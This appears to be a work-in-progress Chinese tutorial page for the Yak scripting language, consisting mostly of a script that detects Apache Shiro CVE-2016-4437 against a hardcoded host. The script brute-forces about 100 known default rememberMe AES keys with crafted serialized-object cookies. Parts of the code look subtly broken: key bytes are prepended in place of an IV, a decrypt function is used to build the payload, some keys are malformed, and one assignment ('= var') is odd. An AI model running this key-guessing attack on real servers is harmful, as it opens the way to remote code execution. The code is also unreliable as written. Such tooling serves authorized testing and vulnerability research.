跳到主要内容

Shiro CVE-2016-4437(WIP)

阅读本文前,请先确保已经熟悉 ThinkPHP-5.0.25-RCE 中相关内容

本篇中将会涉及到 Shiro 这类比较复杂的漏洞检测,我们将完全通过 Yak 内部的模块完成该模块

Work In Progress

更详细的编码教程与解读我们将在后续补充

原代码

log.setLevel("info")
isHttps = cli.Bool("https")

// 构建 shiro 基础请求
baseFreq := fuzz.HTTPRequest(`GET / HTTP/1.1
Host: example.com
Connection: close

`)[0].FuzzHTTPHeader("Host", "cybertunnel.run:8080")

// 发送数据包,取一下指纹结果
result = baseFreq.FuzzCookie("rememberMe", "{{rs(10)}}").ExecFirst(
    httpool.https(isHttps), httpool.redirectTimes(4),
)[0]
die(result.Error)

url, reqRaw, rspRaw = result.Url, result.RequestRaw, result.ResponseRaw

// 检查指纹
headers, body := str.SplitHTTPHeadersAndBodyFromPacket(rspRaw)
if !str.MatchAnyOfSubString(headers, "rememberMe=deleteMe;") {
    die("no shiro detected")
}

log.info("shiro on %v detected", url)
log.info("start to check key")

// 指纹检测工程,接下来准备猜 key
keys = [
    "kPH+bIxk5D2deZiIxcaaaA==",
    "4AvVhmFLUs0KTA3Kprsdag==",
    "Z3VucwAAAAAAAAAAAAAAAA==",
    "fCq+/xW488hMTCD+cmJ3aQ==",
    "0AvVhmFLUs0KTA3Kprsdag==",
    "1AvVhdsgUs0FSA3SDFAdag==",
    "1QWLxg+NYmxraMoxAXu/Iw==",
    "25BsmdYwjnfcWmnhAciDDg==",
    "2AvVhdsgUs0FSA3SDFAdag==",
    "3AvVhmFLUs0KTA3Kprsdag==",
    "3JvYhmBLUs0ETA5Kprsdag==",
    "r0e3c16IdVkouZgk1TKVMg==",
    "5aaC5qKm5oqA5pyvAAAAAA==",
    "5AvVhmFLUs0KTA3Kprsdag==",
    "6AvVhmFLUs0KTA3Kprsdag==",
    "6NfXkC7YVCV5DASIrEm1Rg==",
    "6ZmI6I2j5Y+R5aSn5ZOlAA==",
    "cmVtZW1iZXJNZQAAAAAAAA==",
    "7AvVhmFLUs0KTA3Kprsdag==",
    "8AvVhmFLUs0KTA3Kprsdag==",
    "8BvVhmFLUs0KTA3Kprsdag==",
    "9AvVhmFLUs0KTA3Kprsdag==",
    "OUHYQzxQ/W9e/UjiAGu6rg==",
    "a3dvbmcAAAAAAAAAAAAAAA==",
    "aU1pcmFjbGVpTWlyYWNsZQ==",
    "bWljcm9zAAAAAAAAAAAAAA==",
    "bWluZS1hc3NldC1rZXk6QQ==",
    "bXRvbnMAAAAAAAAAAAAAAA==",
    "ZUdsaGJuSmxibVI2ZHc9PQ==",
    "wGiHplamyXlVB11UXWol8g==",
    "U3ByaW5nQmxhZGUAAAAAAA==",
    "MTIzNDU2Nzg5MGFiY2RlZg==",
    "L7RioUULEFhRyxM7a2R/Yg==",
    "a2VlcE9uR29pbmdBbmRGaQ==",
    "WcfHGU25gNnTxTlmJMeSpw==",
    "OY//C4rhfwNxCQAQCrQQ1Q==",
    "5J7bIJIV0LQSN3c9LPitBQ==",
    "f/SY5TIve5WWzT4aQlABJA==",
    "bya2HkYo57u6fWh5theAWw==",
    "WuB+y2gcHRnY2Lg9+Aqmqg==",
    "kPv59vyqzj00x11LXJZTjJ2UHW48jzHN",
    "3qDVdLawoIr1xFd6ietnwg==",
    "ZWvohmPdUsAWT3=KpPqda",
    "YI1+nBV//m7ELrIyDHm6DQ==",
    "6Zm+6I2j5Y+R5aS+5ZOlAA==",
    "2A2V+RFLUs+eTA3Kpr+dag==",
    "6ZmI6I2j3Y+R1aSn5BOlAA==",
    "SkZpbmFsQmxhZGUAAAAAAA==",
    "2cVtiE83c4lIrELJwKGJUw==",
    "fsHspZw/92PrS3XrPW+vxw==",
    "XTx6CKLo/SdSgub+OPHSrw==",
    "sHdIjUN6tzhl8xZMG3ULCQ==",
    "O4pdf+7e+mZe8NyxMTPJmQ==",
    "HWrBltGvEZc14h9VpMvZWw==",
    "rPNqM6uKFCyaL10AK51UkQ==",
    "Y1JxNSPXVwMkyvES/kJGeQ==",
    "lT2UvDUmQwewm6mMoiw4Ig==",
    "MPdCMZ9urzEA50JDlDYYDg==",
    "xVmmoltfpb8tTceuT5R7Bw==",
    "c+3hFGPjbgzGdrC+MHgoRQ==",
    "ClLk69oNcA3m+s0jIMIkpg==",
    "Bf7MfkNR0axGGptozrebag==",
    "1tC/xrDYs8ey+sa3emtiYw==",
    "ZmFsYWRvLnh5ei5zaGlybw==",
    "cGhyYWNrY3RmREUhfiMkZA==",
    "IduElDUpDDXE677ZkhhKnQ==",
    "yeAAo1E8BOeAYfBlm4NG9Q==",
    "cGljYXMAAAAAAAAAAAAAAA==",
    "2itfW92XazYRi5ltW0M2yA==",
    "XgGkgqGqYrix9lI6vxcrRw==",
    "ertVhmFLUs0KTA3Kprsdag==",
    "5AvVhmFLUS0ATA4Kprsdag==",
    "s0KTA3mFLUprK4AvVhsdag==",
    "hBlzKg78ajaZuTE0VLzDDg==",
    "9FvVhtFLUs0KnA3Kprsdyg==",
    "d2ViUmVtZW1iZXJNZUtleQ==",
    "yNeUgSzL/CfiWw1GALg6Ag==",
    "NGk/3cQ6F5/UNPRh8LpMIg==",
    "4BvVhmFLUs0KTA3Kprsdag==",
    "MzVeSkYyWTI2OFVLZjRzZg==",
    "CrownKey==a12d/dakdad",
    "empodDEyMwAAAAAAAAAAAA==",
    "A7UzJgh1+EWj5oBFi+mSgw==",
    "YTM0NZomIzI2OTsmIzM0NTueYQ==",
    "c2hpcm9fYmF0aXMzMgAAAA==",
    "i45FVt72K2kLgvFrJtoZRw==",
    "U3BAbW5nQmxhZGUAAAAAAA==",
    "ZnJlc2h6Y24xMjM0NTY3OA==",
    "Jt3C93kMR9D5e8QzwfsiMw==",
    "MTIzNDU2NzgxMjM0NTY3OA==",
    "vXP33AonIp9bFwGl7aT7rA==",
    "V2hhdCBUaGUgSGVsbAAAAA==",
    "Z3h6eWd4enklMjElMjElMjE=",
    "Q01TX0JGTFlLRVlfMjAxOQ==",
    "ZAvph3dsQs0FSL3SDFAdag==",
    "Is9zJ3pzNh2cgTHB4ua3+Q==",
    "NsZXjXVklWPZwOfkvk6kUA==",
    "GAevYnznvgNCURavBhCr1w==",
    "66v1O8keKNV3TTcGPK1wzg==",
    "SDKOLKn2J1j/2BHjeZwAoQ==",
]

data = codec.DecodeHex(`aced0005737200326f72672e6170616368652e736869726f2e7375626a6563742e53696d706c655072696e636970616c436f6c6c656374696f6ea87f5825c6a3084a0300014c000f7265616c6d5072696e636970616c7374000f4c6a6176612f7574696c2f4d61703b78707077010078`)[0]

cookies = make([]string)
for _, key = range keys {
    for _, rs = range [
        codec.AESCBCEncrypt,
        codec.AESGCMDecrypt,
    ] {
        keyBytes = codec.DecodeBase64(key)[0]
        res, err := rs(keyBytes, data, nil)
        if err != nil {
            println(err)
            continue
        }
        cookieRaw = append(keyBytes, res...)
        base64dK := codec.EncodeBase64(cookieRaw)
        cookies = append(cookies, base64dK)
    }
}

println("start go fuzz rememberMe")
r, err := baseFreq.FuzzCookie("rememberMe", cookies).Exec(httpool.https(isHttps), httpool.size(3))
die(err)

keyFoundResult = var
for result = range r {
    if result.Error != nil {
        continue
    }
    header, body = str.SplitHTTPHeadersAndBodyFromPacket(result.ResponseRaw)
    if str.MatchAllOfSubString(header, "rememberMe=deleteMe") {
        continue
    }
    keyFoundResult = result
    break
}

// keyFoundResult
println(string(keyFoundResult.RequestRaw))